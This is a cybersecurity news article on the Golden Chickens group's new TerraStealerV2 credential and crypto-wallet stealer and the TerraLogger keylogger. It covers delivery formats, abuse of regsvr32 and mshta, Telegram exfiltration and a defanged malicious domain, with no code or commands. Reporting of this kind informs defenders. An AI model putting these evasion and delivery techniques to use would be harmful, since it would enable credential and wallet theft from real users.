Cybercriminal group Golden Chickens is back in the spotlight, this time with a fresh arsenal of tools engineered to steal credentials, log keystrokes, and compromise user security at scale. The two new threats, dubbed TerraStealerV2 malware and TerraLogger, are the latest evidence of the group’s ongoing efforts to evolve their malware-as-a-service (MaaS) offerings.

For years, Golden Chickens, also known as Venom Spider, has been tied to major credential theft and infiltration campaigns, most notably through its More_eggs malware. But these new variants show a calculated pivot toward targeting browsers, crypto wallets, and user keystrokes more aggressively than ever. The malware duo is being spread through file formats like EXE, MSI, and even shortcut files like LNK, making it difficult to detect and easy to distribute.

What Is TerraStealerV2 and How Does It Work?

TerraStealerV2 malware is designed to harvest sensitive user data from browsers and cryptocurrency wallets. It scans for browser credentials, accesses saved logins, and attempts to extract information from browser extensions, potentially leading to a crypto wallet theft if the extensions are used for asset management or trading. The malware is often delivered via OCX payloads, a type of ActiveX control file, pulled from shady domains like wetransfers[.]io. Once downloaded, it leverages legitimate Windows utilities like regsvr32.exe and mshta.exe to execute its payload while evading security systems. 

🚨 New malware drop from Golden Chickens: TerraStealerV2 steals browser logins, crypto wallets, and extensions, while TerraLogger silently records keystrokes.

📦 Spread via EXE, MSI, LNK, OCX
📤 Sends data to Telegram + shady domain

🔗 Read this report: https://t.co/mhBKLWlxr9 pic.twitter.com/PKBjjfqqmd

— The Hacker News (@TheHackersNews) May 5, 2025

Though it does attempt to pull Chrome login data, it fails to bypass the newer Application Bound Encryption (ABE) protocols introduced in Chrome post-July 2024, hinting that the tool may still be under active development or simply outdated. Data collected by TerraStealerV2 malware is then sent off to Telegram channels and external servers, allowing attackers real-time access to user credentials and activity.

TerraLogger: A Silent Keylogging Threat

Unlike its data-harvesting counterpart, TerraLogger takes a simpler but no less dangerous approach. It acts as a standalone keylogger, quietly capturing every keystroke typed on the infected machine. From login credentials to personal chats, this malware can record it all. Though TerraLogger doesn’t currently exfiltrate data or interact with any command-and-control (C2) servers, its design hints at its future integration with broader malware campaigns. Golden Chickens may be planning to pair this keylogger with other tools in their ecosystem to create a more comprehensive infection chain. Despite its simplicity, TerraLogger still represents a major concern for browser security, especially when used in combination with data-exfiltration tools like TerraStealerV2.

How Are These Malware Variants Being Spread?

Golden Chickens is employing a variety of file types to distribute their malware, increasing the chances of infection. Common delivery formats include:

• Executables (EXE)
• Microsoft Installer files (MSI)
• Windows Shortcut files (LNK)
• OLE Control Extensions (OCX)

This multi-format approach makes it more likely for unsuspecting users to install the malware. Once executed, the payloads spring into action, mining for data or logging inputs while avoiding basic antivirus scans. Worse still, the use of known Windows utilities and Telegram for data transfer provides both obfuscation and control, as messages can be quickly customized or deleted on the attacker’s end.

What Does This Mean for Browser Security and Crypto Users?

The emergence of TerraStealerV2 malware signals a renewed focus on browser-based attacks. With many users storing credentials in Chrome or using browser extensions to manage cryptocurrencies, a single infection could compromise access to financial platforms, crypto wallets, or even corporate intranets. Meanwhile, the rise of crypto wallet theft through malware like TerraStealerV2 reflects a broader trend in cybercrime. Stealers are becoming more modular, more customizable, and harder to detect. Even though both TerraStealerV2 and TerraLogger appear to still be under development, their current functionality is already dangerous. As Golden Chickens continues to refine these tools, we can expect even more stealth, deeper system penetration, and broader targeting capabilities.

Ongoing Threat and Future Risks

The advent of new malware tools from Golden Chickens demonstrates how many actors are developing new methodologies. Though TerraLogger is limited as purely a keylogger, it can perform some of the functions of a keylogger with the TerraStealerV2 malware or the rest of the malware toolkit as part of a greater multi-stage threat. With more reports of browser vulnerabilities and stolen crypto wallets, it is important to keep up with the ongoing availability of resources like Golden Chickens. Users and organizations should be tracking everything they download, limiting the amount of insecure software they use, and ensuring their browsers are up-to-date with the latest security protocols. The history of TerraStealerV2 and TerraLogger is just the start, and will continue to evolve, just as our responses must evolve.